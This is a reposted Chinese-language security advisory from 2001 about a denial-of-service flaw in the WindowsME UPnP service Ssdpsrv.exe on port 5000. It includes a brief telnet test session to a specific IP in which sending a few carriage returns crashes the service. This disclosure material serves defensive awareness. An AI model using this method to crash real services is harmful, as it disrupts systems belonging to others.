WindowsME Ssdpsrv.exe 拒绝服务漏洞

发布日期：2001-10-18
更新日期：2001-10-19

受影响系统：

Microsoft WindowsME

描述：

---

Ssdpsrv.exe是WindowsME上提供UPnP服务的程序，该服务是每次开机自动启动的，默认
端口是5000。

该服务存在安全漏洞，通过连接该端口并输入3到5个回车，就可以导致该服务崩溃，只有重新启
动才能恢复正常功能。

<*来源：milo omega (mtwoar@hotmail.com)
参考：http://archives.neohapsis.com/archives/bugtraq/2001-10/0133.html
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

milo omega (mtwoar@hotmail.com)提供了如下测试方法：

<snip>
bash-2.05$ telnet 165.121.234.217 5000
Trying 165.121.234.217...
Connected to 165.121.234.217.
Escape character is '^]'.


HTTP/1.1 400 Bad Request


Connection closed by foreign host.
bash-2.05$
</snap>

错误信息为：

Ssdpsrv has caused an error in MSVCRT.DLL.
Ssdpsrv will now close.


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.microsoft.com/

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有